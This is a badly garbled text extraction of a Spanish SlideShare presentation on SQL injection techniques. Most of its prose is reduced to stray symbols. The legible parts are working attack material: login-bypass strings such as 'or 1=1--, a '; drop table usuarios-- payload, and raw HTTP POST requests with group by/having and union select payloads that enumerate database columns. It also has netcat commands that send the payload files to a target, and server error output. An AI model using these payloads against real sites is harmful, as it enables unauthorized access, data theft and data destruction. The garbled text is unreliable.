SlideShare uma empresa Scribd logo

Tecnicas de sql injection

Alan Resendiz
Alan Resendiz

SQL

Internet
1 de 44
Baixar para ler offline
!
! " #$%& ' ( ) " * + " ,- # . / "0#$% ' " , * ) 1 % )" + ! " , * , ") - ** 2 #$% ' " - " " 3 #$% 4 ) 5 , ! ) % " " 5 " 67" ) " " " . " * 8* " ! 6 . " . 5 9 " , # #$% 4 :) * * + ;7 " / # . ; , " 8< + " " = " " " ) " >; ) - " .> 5 " , " 4 ' " ; " 4 # ! " 8< # ! " 4 ! ' , * ? #$% 4 : " - " " , " @ ' " ' " " A " B * " + % " ' " C ; " A " " ' ) " 5. " "" # 8 " )4 * " & " 7 " " " ( D # ) + = * 6 " " " " " ) & " + 6 9 & 6 & " . " + " " . ! & 9 " " " " 6 ( " " " . " & . " " 4 " " " "& "= 7 " + " ( " 7< " ) " . (( # +
2 ; " " 6 " . " " .& 9 " ) ) * 9 * " " 6 ) + " " " ) " 5 . " & 7 " 6 (& " " " . 4 #$%& " * " 9 " " ( " " " " " $ ! % & ' 5 * " D C 2 . " " ) 4 ) " ) " 6 " . - ' & )4 6 " . 4 " * 9 " * " 9 " ) " " "& 9 " 9 ( " ) 4 ( ) " & " * ) " * . " 4 " " % " + 4 " . 4 #8$ 8% ># 8 . " $ + % . . > * 6 * 6 7 " D C & #8$ 8% + * & 6 " . "& #$% E# $ + % . . F ! * " " " " D " & 9 - ( " ) " " ,- 9 " . & 9 . 4 #$% " 6 + = " " " E#+) " & : + " * <F * 6 " " 51# CB@ + " #: * " CB % . . = " 6 " " #$%BC + #$%C & " " ) 4 " " " "& + .= . " 6 " " 6 " " " +& " D " " >! #$%> " 9 4 " 9 " " . 4 ) ) " 6 " & ( 4 " " . " 4 " "= 9 . & 6 " " #$%2 " ) " " . 4 " . 6 "& 9 " + 9 " " " " 6 6 " 6 . 4 " ( ) * # +, $ ( " " " " " ) " " " 9 - + " * & ) 4 ) 4 " " 9 " = " " = ,:# ! 9 "& 9 " * " & " ) ) 4 9 " 6 " 2 G " E, . * & " 6 " " " " " " F& " * ) " D= " " ) " ) :# & " " " ) " ) " . " 6 " !' " " %51
3 5 ) & " " C & 9 " " . ) " " " ( ) " ) & ) 9 . ) " " 6 " 7 9 9 " ) 4 & " 9 " ) * " " - " . = " 6 6 " # & E! 9 " ) " 6 " 2F " 9 " * ) 4 = " * 9 " ) :# 2 % " 9 " 7" " " & + ) " " " ) " & " * * 9 - " . = " :# " 9 " * & ) = ) 9 " ) " :# 2 G " 1; 8 " " & " * ( ) 9 " 6 " " 6 & 9 = " . " 9 6 6 " . ' " & 6 " 9 " )= " #+) " " - " , " 9 . :# + " * G " 1; , " * D CC = 6 " ) #0#$%& ) 4 ) > " * #$% # 6 3 * G " 1;> H " & " ( = ( " " D CC2 , " " & 67" " " * #$%& " * " 6 " 6 " " " . E#$% F& 9 ( " . " " " " " & " + CC? " #$% @ " & " 9 " " " 9 6 " #+) " G " 1;& + . #$% CCB " * 0 " ) " . . 6 " " " 5 ) . " & " * #$% " 6 " & 9 " " " " I ) & " 9 " ) " * " ) . " - " , " ( #$% # 6 & " 6 ) " 9 " . " " & " . " " "& " " " " 6 4 " " " . " & 9 " " " " " "& ) = " 4 6 " . . " " =" " "- .# / ! 0 ' 9 * & " " * & * " 9 6 9 " " " * " + 9 " " "& " " " ) " 6 "& + " " #$% # 6 " < " .
? # ) " ) + " " #$% ) " & 4 & * " " ) " " ) " " . 9 )6 ) = " ) 4 . & " 9 . " " & " 9 & " & " + ) " ) 4 " E' " " J " " " " #0#$% # 6 & 9 " 6 " " F 8 " " & " . " " ) " " 9 " 6 ) " " " " " " " #0#$% 9 " . & 6 6 " 9 " . " )4 6 & " 7 " #$% 4 %# ) ; . " & ". " * " " " " + " 6 "& 9 4 " " #0#$%& " "* " * & 4 " " "& 9 ) " . 6 " 8 " #0#$% " . " " >#5> + . " = " & "" * " " > > E- KKF 8 " 9 . " = & 9 6 " #5 " ( . " " 6 4 " EIF " #0#$% # 6 & ) " " ) " " " & " ) 7 " " 6 " < " 6 . "& " 4 & " " < " ( 1 ( * $# + ) #0#$% " < " " "& ) = " 1 % )" 6 L"& " 4 " " . " " < " " ) 4 " 5 " " 6 " E#51& 5 ; M& !N #!N& ;'!& F + = " " " ( 9 " 9 " " * " " & " " " ;'! ! + 1 ! 5 " + " 9 " E8" F ( ) " " & " 6 #0#$% # 6 & " " ;'! 332 5 ) " ) " I . " 9 . " ) " + ) 4 " 6 " 9 " " " + * " " " " ) 9 " " ) " " " . & 9 " #0#$% " & *
@ 8 * 6 " ) " " = " " D " 6 #$% E! 4 #5 "" > >F " " " " 7 " + #$% " 9 6 " . " & " 9 ) 7 "& " " 6 "& . ;:,:# " " " ) " " 6 ) 1 + ( & ,#)) ; , 6 % * " >; ! * . " * #$% # 6 > O#$% # 6 " * " " " , ") " - ** " " " > 8" " . * 9 1: < " 6 "& " 9 " " * * " + " " 6 P & " " " " 6= " 9 " " " ,! " #$% # 6 " & " ) . " " " " " " < "& 9 + " " ) < & " " " " " 6 ) " # ) " " " " * " ") " ) ** #$%& 9 " " ) > M . 8< " G " >& " ) " ") ) ** " ) " " " " " >" 6Q * EF> 5 " < = " > M . 8< " G " > E #-1 B303B 022CB0@F " " 9 ( < ) < Q M9 < Q " " < Q < < Q" "9 " + < Q"9 . < Q " " < Q" 6 < Q " + " < Q 6) ! -""" " Q " Q " Q . + " Q " + " Q " +
"2 % & , ; " ) & #$% " . 4 " " 5 " " * " < " " " " " E!%0#$% " : & ; " 0#$% " " * F " 6 "& < " . " " " "& . " " " " & " * * " 6 ( " " " . " % & +% + % ! .# . & / 51; ( . " " 8H:R8 ( 6 " " ,81S ( . " % & ++ + + ) .# . & ' 85;8 ( 6 " ) "& " = " , :! 8 ) " = " 5%;8 ( * " ) " . . " ) * " " % & + + #! .# . & #8%8'; ( " . " " ) " " 9 " "* . 1#8 ; ( . " " ) " " J !,5;8 ( * " 6 " " " + . " " " * " ,8%8;8 ( . " " ) ) " " %! # #! % " " " " " * ( " * " " 9 " " %! # #! A : ( " * ) " 6 " " . " " G 8 8 ( " * " " 9 ) " . " " 9 " 6 " / : ! -S ( " " . " " " " . " " =* " 5H 1/ ( < " 9 ) " "* . : ,8 -S ( " . " " " " " *
B 3 % & T 9 U + 9 TU , " TV . 9 UV + . 9 V . 9 -8;G881 ( " * 6 6 " % R8 ( 1 ( " * . " " ) " " 4 & ! SELECT * FROM Tabla; E8" " 6 6 " " " . " " ) >; ) >F UPADTE Tabla SET password = 'Juajuajua' WHERE user = 'admin' E8" " ( = "" " & 6 F 5 ) & " . 4 #$%& " * 9 4 " " "& " 9 " " * " " " + 4 " #$% " & " " " 4 " ! . * & = " " * 4 " ) & " " " " 4 " " & 4 # ) " & " 6 " & " + " " 9 6 " . " & " " " 6 " 9 9 7 + #$% " " ) "5 # # 6 7 " 9 . ( . * " 9 "& " . " = " . " " >5 9 " H ) " ' 8 >& " 9 * 6 & " " 9 " ) & & " " " #$% ) "&
C " 6 " ) & )4 6 * " " " = " # ) " < 6 " " ) " "& " 6 " ) " . * & " 9 " " * " " 6 " 6 9 " . " 6 " " " < + . " " ) " " " " 6 ) 5 " * " 4 . 4 J . " & ! " # " & " * " " 9 . " " " 7 " " " 8 " & + )4 6 . .J " " " & " " ! " # & ) 4 " " . " " 0 8* " ! 6 . " 0 5 9 " , # #$% 4 0 :) * 0 8< + " " = " 0 ' " ; " , " * & " 4 * 9 * + 9 . ) 4 " . " )4 6 " " * " 6 " ( 6! # ) 7 >#$% 4 > " ) J ) " " " * #0#$%& " 9 . " 9 " & " & 9 " " 9 ) . < 7< 8" " . * 9 " " ) " " " " " " 6 ( " . " " * " 9 6 " " < " * "& " 9 & . " ". * 8" " 6 " " " =* " " 9 + " " " G " * # 6 " 4 " ) " " 5#! ) " " " #0 #$%& " " " G " 9 * " 6 " ) + 4! $ (! & 5 9 " =" " 9 " " " 6 ) & * " ( " " " + .= " " " < 7< "
8 9 + = " " " ) ) " ) 9 ( 6 & " 9 ) 4 " " " 9 " 9 " " " " 8" " ) 9 + = " " "& " 6 " 6 ) " "& ) " " 6 " & " " 6 " 6 ) " " " " 6 " " 6 )& " 9 ) 7 " * " " " ) " " ; " " " * " )& " " : % & " " " & " " " " 6 "& + " ) * " * " " 6 ) . " " ) " + " D :M& " ) 6 " * + = " " " " 9 " " . ) " " ) M. & " . < " " " + " " * " " 8 "& ) . ( ) " " " ) .J " " " * & 6 ( = " = " 6 " . " ) " . " <FORM action=logon/logon.asp method=post> <input type=hidden username=_UserName password=_Password> </FORM> 8" * . . & ) " " " " . " " . 5#! 9 " " 6 " & ) " " E! + J " " ( ) * ; %& 9 . 5#! " < ) " "& . " " " . " " * ; % + 6 6 " " F 8 * 6 + ) ) & * & " . " " + 6 . "= select * from users where username = _UserName and password = _Password 5 ) 9 " " " " & ( " " " . & * " 6 " " " . "II ) " " "= + & " . " " 6 6 4 & " " &
+ ) ) " " ) " < " % " * " " http://www.objetivo.com/libreria.asp?edicion='Noviembre' ! " " & " % = ) " " " " " 9 + " . " " ) + ) " " " .= EN,F ) 7 " " L1 6 ) L " " " 6 . 5#! 9 " 8 " " & + ) ) ) 4 . . ) " " " "* " " " . 9 * 6 " 6 . " select * from numeros_anteriores where edicion = 'Noviembre' " & " 9 ) " " " * " " ) " #$% > 6 >& = " " 9 " . * 7 " " . & + . " + " + 9 ) " " " " " & " " " 9 + #$% 5 6 " " " * " " 4 " " " & " " ) " " + " ! & " " L E' # F ( " " " ) " " ( ) 4 " ) + . % L E' # F " " * #$% # 6 * "& " 9 " 6 9 " 4 " * " 9 6 & " 9 " " " " ) 9 + #$% H " 4 9 = " " " " " . ) ( * . " + ) " " " & " Usuario : An'gel Password : 338xD select * from users where username = 'An'gel' and password = '338xD'
select * from numeros_anteriores where edicion = 'N'oviembre' 8 ) " " " 9 " 9 " " " " " " " #$% # 6 & " 9 " & " 9 " . " . ( " " + " . " username = 'An' edicion = 'N' % . & " . 9 " . " * " "& #$%& * " ( & 4 " " " & " 9 9 9 " " " " + & " . * #$% # 6 5 ) 9 " = " " . + * . " 9 " " " L5 L + L1L II 8 " & . " " 6 " 9 9 " .J 6 6 67" ) " " + " " * " " 4 " * " %& " " " ) "& " " ( 6 & ( . " 8" " * 6 & " 6 9 " " " " " " " " )4 6 + ) 4 " " " " )" " ) " " . " . & " " " " " " " 6 "& " * " 9 " . ) " " 8 * 6 & 9 " " " . " " & " " 6 6 . & ) ) . " .J . 7< + . ) A ) = " ) 7 & " " " " 6 " & 9 " " E84 " " ? >8 # 6 >F " 6 " " ) 7 " " . & 9 + #$% " 6 ) " " 9 "& 9 " < 9 ) " " ) 4 + " ( 7 " " " " ' " ' & " ) 4 > . #$% # 6 " . #$% 4 > EH B * " + " "F ( ( 9 " " * . 6 ) " 9 " . " <
2 1 $ % & ' (#)* +! , - . , / % 0 , , 123 % & - & ) " 6 9 * & " " " & " ) " " " ) ) " * " " " ) " " + "& . " " I " + = " " "& + " 9 " . & " ( .J ) " E! * >. . >F ) " " 9 " ." > . " > ) " " " . " " >% " ' "> )4 6 6 6 7 ! 8 ( . " 6 " " 7 " #$% 4 & " * 9 " . " 9 " " "& 9 . " " ; %& 5#!& & " " " 6 ( 9 " < #$% # 6 ' " 9 " ) "& "& .J " 6 ) & " & 4 & . " + ) 4 * & 6 " " * " EH > % " ' ">F # ) & " > 6 " > + = " " " = " * " 6 & " " . 9 " ) ) + = " " " " " 9 & 4 & " " . " . " " " ) "= 8 " " & . " " 6 ) " " 6 " # ) . " " " " ) " * & 1: ) ) " & " " " " * " * " " & " 6 " 6 " " " ) E8" " ) "& ) 6= " "& " ) 6 " + . F 9 ;:,5 * & 6 " " > "> " + J 9 " " " 6 ( " . 9 " ) ! " " 6 " & . " = & " ( . " 7 " " " 9 . * ) " . " " 7 & "= ) 7 * 9 " =
3 $ (! 6) $ (! ) & 3( " " " " " .= "& : 0% ! . " " & # 86 " : 0% & " , " " + * " .= & ! . " " " " D " 9 " 6 " + ) " < " " + * " " " " " " " . *= " " " - & 9 4 4 4 ) " . " 4 " " " " " " " " " ) "& 9 " "& " . " " 6 " * . / = " + " 5 " " " " & ) ) * "& ) . " " + * "& " " ) 6 " " " ! " " " . " . I ) & " 6 " " * " "& " E> L >F * + " 6 " * " ) 6 " H 7 " " + .J " " " " . " #$% = " " " * 9 " " " . " " . ! " 9 + = " " " " " * " ) * ; % 5#!& * " " = " " 9 6 " 9 " " " 6 "& . " # 5 : + !5##G: , " " . . 5#! 9 ) " + 6 #$% ; ) 7 = " " 9 * " " 6 #$% " < " " . " " " 4 " ! 6 " 4 8" " * . < = " ) 6 ) & . *= ---- Extracto ------------------------------------------- <FORM action=ingreso.asp method=post> <TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0> <TBODY> <TR bgColor=#ff0066> <TD><B><FONT face="Arial, Helvetica, sans-serif"
? size=2>Nombre</FONT></B></TD> <TD><B><FONT face="Arial, Helvetica, sans-serif" size=2>Clave</FONT></B></TD></TR> <TR bgColor=#ffcccc> <TD><INPUT name=USERNAME> </TD> <TD><INPUT type=password value="" name=PASSWORD> </TD></TR> <TR align=middle bgColor=#ff0066> <TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD> <TD vAlign=top align=left width=10> </TD> <TD vAlign=top align=left width=140> <TABLE cellSpacing=0 cellPadding=0 width=140 border=0> <TBODY> ---- Extracto ------------------------------------------- ! " 9 * ( = & ; % " "& + " 4 . 5#! E! " " & . " " F 5 ) & " " 9 ) 4 ( . " " & " 9 6 " " " " " "& " " " 9 * #$% " 6 " " ) " ) . 9 + " 6 " " select * from users where username = 'Angel' and password = '338xD' ! " " 9 " " + "" 9 . ) < " ) " " 9 ( " * 9 = 6 ( 6 ) " " ) * " " ) #$% 4 " I :M& 6 " " * = " " + . " " " + " D . " 'or 1=1— Usuario : 'or 1=1-- ! "" L V W A 47 " "& 9 = " . ) + . select * from users where username = ' or 1=1-- and password = ' or 1=1--
@ 1 9 " 9 " < " " " >: > 9 " & " " " 6 6 " 6 E " 6 " ) F & . + = " " " " " " " . " " 1 ( , 0 4 Usuario : 'OR''=' Password : 'OR''=' 5 4/ ' ) & " " 6 + 6 4 . " > " ">& " " " > 00 > E, ) / F " #$% ( & " " "& #$% 9 . 9 6 . . + # ) " " 7 " . " 6 " 9 . " < + " & " & " 6 " & " ) "& " . " " & ( " 6 . # . 4 & " " " " " " 9 < " " " )4 6 & .J " * >5 > > > " = + . " Usuario : Admin'-- Password : 'or 1=1-- 8 = & " 9 " " = " " " . select * from users where username = 'Admin'-- and password = ' or 1=1-- # " * "= + " . 4 & ) ) + " . 8 " & " 6 " ) 6 " " " > L > E' " F " " + > 00 > E, ) / F 6 9 " + " < "& " ) "
" " > " . "> 6 " ) "& 9 " " " " . ) 4) # $ 7 ! . ! # 5 " " " " " * " < #$% + . & " 6 " ) 9 6 6 . " " ) " * " " " " . 9 " " ' + = " 9 " " & . + & = " * & ) 4 " > < " . > 9 " + * . " + " " " " " " ! " 9 . E' + < " F& " " " "& " " " " " . & . 9 9 " J " " ) " " "& + " 9 " 6 " " " & 4 & " 6 * " " " " " 6 " " " " ) 4 & " 6 " 4 & " + * " " " ) " < 6 . & . " 9 " " " . " " " 6 5 " * " " ) " * " " "& " 6 6 . " " ( " " " 9 D ) "9 " + * " " * " 1 7 ! $ 7 ! . % # " ' ; #$% # 6 & + " 6 " " 6 & " 6 . " " 6 ##$%#8 H8 & " > < > < Q " ) & " ) + > > " " " " ) " " #$% # 6 )Q ) " ) " ) " " * ) ) "& 6 " )4 "& + . ) " " * " 1 ) " " )4 " ) " " " . " 8 4 " " " " " . * .J 8 " " "& " " . * " " " " ) " + 6 " "
B . 6 9# + & % " 9 " , . # 6 & . & " " " D " & " 6 " " " " " E' = " 5 F " " E8 " " * 9 " 9 " . ) " = " & 4 " " 6 " ( + ( & F 5 * " " " " " 9 " 6 " " & 9 6 " & " .J ) . 6 9 J * 9 " & . 4 & " " " " 9 = . " " 6 8 6 " " & M " " * " & 6 ) + #$%& = 4 & & 9 4 " " " Usuario : '; drop table usuarios-- Password : # * & " " 6 . " * EH " >8* " ! 6 . " >F & ) ) ) > " "> " & 9 " & .J " * " * " ' & + " " " & 6 " 6 ) ( " " & 6 5"= + & " 9 , # " " " " 9 " . 7 " " ) "& 9 ) " ( & ) = " + 1 $ % % + 67 & 4/ ) . $ : 3( ) & ! #& ! ) ) " * " " " " ( 7 " #$% 4 & " " " ) " 9 ) " " :,-' :%8 ,- 4 " #$% # 6 . ( D " # ) " " 9 & " . " & " " . 7< & " " " E " 9 ) " " ( = & . ) " 6 "& . " ) " 9 & + " " ) " " " * F
C " 9 " " " 6 ) " + * 1 8 .1) 8 & " 9 6 ( " 6 " & 6 " " " 6 " ) " " " 9 " 6 ) " "& . " + * & " " * 9 " < " " 4 " " & + " " " 6 " " " " + " 6 ( " ! " " " . 4 & " " " ) " > L > E' # F " " D * " " . Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')'., SQL state 37000 in SQLExecDirect in php/db_odbc.inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.login=''') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages).) Session halted. - & 6 " 9 * " < " :,-' :)6 " " " * #$% % < ) " " " . " E > )Q ) >F 2 ! " * )Q ) & " 9 " 3 8 ) ) " " ( " > " > ? " " " " > . > - & " 9 6 + " 6 " . * 9 + . " " :,-' 8 )Q ) 1 3 % ) 010.8#* - "3.9$ (")-#) :;<< 123
----- Fragmento ----------------------------------------- <?php /* * Session Management for PHP3 * * Copyright (c) 1998-2000 XXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * Modified by XXXXXXXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * * $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $ */ class DB_Sql { var $Host = ""; var $Database = ""; var $User = ""; var $Password = ""; var $UseODBCCursor = 0; var $Link_ID = 0; var $Query_ID = 0; var $Record = array(); var $Row = 0; var $Errno = 0; var $Error = ""; ----- Fragmento ----------------------------------------- - " " " " >" " > 6 " " 6 " " 6 ) " X " + X! "" " " . & " 9 " ( " " " . " " 6 " " " " * & . " 6 4 * . 9 " * & " "& 9 * 9 9 6 " #$%& A " + 6 & " " . " 6 " " " . " " < 9 " 6 " * " " " ) E8 " " = ) " )Q ) F : ) & * / ! :M& 6 " " 9 + #$% + " * 6 " ) " " ) " "& * . + " " " ) 9 4 * " + . & " 9 4 " " ) " 6 + .
8 " " 6 " " " " ( & " ( 7 " #$% 4 & " " ! " 9 " 6 " " " * & . " 6 4 6 " " & " " 9 " " ) "& J " " ( 9 " " " ) " " ) < 9 6 7 " ;;! " 6 " # " + ) " " ' % E8 M " " B * " + % " ' "F& 9 " " " ) 4 E5 . 6 & " . F " . . = " - " 9 " 6 " " " " 6 " * " 7 " ;;! " )4 6 & " < " "& ( 9 D " 6 " < & " " " 6 < & " . * nc -vv www.objetivo.com 80 < sentencias.txt ' " ' + " * " " ;;! * & ( " ** * E8 " " * # +1 & " 8 9 F& . . " ) )4 6 . " ) " + " D " * " E5 . ) " " " F& " 6 " " 8" * " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 34 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Angel&txtPassword=Angel Y Y Y H . " >! "" >
Y * . " Y H . " > " > * . " - & " . 9 " " * !:#; ) " " ** 6 < 9 4 < & " " ) " " " . ! " 9 " " . + " ) 9 " " " " ) " + ) > L > E' " F * & 6 6 " & ) ( " ) " * ) ( 6 * ! " " 6 " " " " " " #$% 9 " " E 6 .& . )+& F 8 )4 6 " " ( > > " " ' " " " " > "> #$%& " * " 6 " * " 9 6 9 #$% E 4 6 < & " 4 :%8 ,-F ) " " " " )" 6 "& " 4 " * 6 " " 6 " " H 6 " " " 4 < 6 " " " * " ( " 7 !:#; 9 " ( " 6= ( " ) 4 6 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 46 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27having+1%3D1--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
2 1 . $ " = 3 )*1( 5*'> ! ) 6 " " " . " " " 6 !:#;& " 9 " " " ) " > "> " " " " ;;! % ) " " ( * " " 9 6 " 6 " ! + 4 ' # Z ] ! + ' Z2- , " ! " Z25 O O 8" [ Z V # . . Z2, & ' Z ' E ! 7 " " Z B F ! 7 " " Z C U + Z28 T Z2' 5 ) ! [ " Z - 0 " 0 ^ - M # " Z?' Q " Q :MK 9 " ( " 4 < & " " " " ( " 6= & + 6 9 " ! " 6 " 6 = 9 " 6= " " " 9 " 6 " 9 " & + 6 " 9 " " " " " ) 8 " nc -vv www.objetivo.com 80 < Injection.txt > result.html - 6 " 9 " 9 . " " + > 6 .>& ) " 6 " * " 9 4 " " ! " " " & . " & " 7 * " 9 " " * " ) " " " " + " H " 9 4 " "
3 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 ! * KK " " " & " )" 6 9 " 4 " & 6 :,-' #$% # 6 " 6 6 ) ) ) " " ( * " " . . E # 5 :#F& "= ) 7 " E " ,F 5 9 " ) ) & " * " = & " 6 6 " " * 4 < + ( " " * " " "& " " " ) # 5 :# H " 9 = " * " 6 !:#; POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 71 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx =COUNTRYNAME=Argentina txtUsuario=%27group+by+usuarios.UserID+having+1%3D1-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " H + L. )+ " " " , 6 . V 00 % . 4 6 " = & 6 " " . " Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UID' is invalid in the select
? list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 6 ( " " " & " 9 " " > 6 .> " 6 ( " >. )+> " ) + " , ) # 5 :#& " " , # . " .= & " " " " " + " " 9 ) # 5 :# ( " > . " > * " " "& " > 6 > " ) " + 8" " = * 'group by usuarios.UserID,usuarios.UID having 1=1-- #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85 * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre having 1=1— #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85
@ * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre, usuarios.Email having 1=1-- #! ! * HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date: Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23 GMT Connection: close Location: PaginaPersonal.asp Content-Length: 139 Content-Type: text/html Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun, 16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private Object Moved This object may be found here. :M 9 =& " )" 6 " + ) " . > " " 8 > 8 9 " " 9 & ) " . * ) " . " > > " ( " #8%8'; . E/ " 1 F A=4 " 9 " " !:#; ;;! 1: " & " 9 " " " 6 . " " " " ) " "& 4 6 9 #$% 6 + E8" " L. )+ " " " ,& " " ,& " " 1 ) & " " 8 6 . V 00F , " & " " 9 & * " * " " " " ) & ( " " " . " ' & . " " " " " . " 9 ;:,:# " " ) " " #8%8'; . & " "& 9 + 9 " " " " #8%8'; " + 9 * " " II 6 " 4 < " # 9 " * " " . SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x AND campo5=y
( 7 E8" " >. )+> + > 6 .>F " ) = " " ) " > >& > > + > 2>& " ) = " < " > ?> E, * " " 9 " . * >#8%8'; _ A : ` a> " = " & " * ) " + " " " 7 F " " " " " " ) ( . " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 297 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3 D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-- &txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y Y H + "L " ) & & & * "+" )4 " & "+" " ) V) VL " "L ) E" ) * "+" )4 " & "+" " ) V) VL " "L )+ " F )+ 00 - 9 " " " III H "& ( " + > "> = ) " 9 " " # * " ( " " . & " " + % . " 1 :1 " . + 9 " " " & " " " " ) " " " #S#:-b8';# + #S#':% 1# " > ,> * 9 " ) " 6 ( " ;:! E8 " " F % " " " ( 1 6 9 " " 6 " #8%8'; 7 " "& "= * 9 ) 6 " "
B 4 ;:!& " 9 . " " ;:,:# " " ) )4 6 " !:#; 6 ;:! F % " 9 = " ) " " " . " " " & Ups' union select b.name,1,1,1 from sysobjects a, syscolumns b where a.id=b.id and a.name='usuarios' and b.colorder = 48 -- 7 " & 4 " 4 " + J . " " " E! 4 9 " " " " " ) ( " > >F ! 6 " " " 7 " 4 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int. /Login.asp, line 85 :M& 6 " :,-' " " 9 ) ) # 5 :# " > " # )!% #, > % . " & 6 " . ;:! + " . " " " " ) " + " :- .# ! #& + 5 ) & & + " 6 ( 9 " " " . 6 " & ) " " ) " ) + " "& " 9 ) 7 " " 6 . " 9 " " % . " & " " " #$% > 1 :1>& D * ># EF> " # ) " 1 :1 " " " " >) " "> 9 " * . 4 #$%& " 9 " J " * "& " ) " J 6 " ) " " ! 4 & " " J 1 :1& " " " > >& ) " " " " " ) " " ! " * # EF& " ) " 7 " . " "
C 5 9 " " . ) " " 6 " " ( " 4 "& & " + ; " " 6 " 4 < + 7 " * 9 . " . " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 82 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu arios--&txtPassword=Angel Y Y Y H 9 6 " >! "" > Y * . " Y H + L " " E ,F& & & * " "00 6 ( "& . 4 " " = 1 6 !:#; " " 6 )4 6 & ) " " " . < Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot 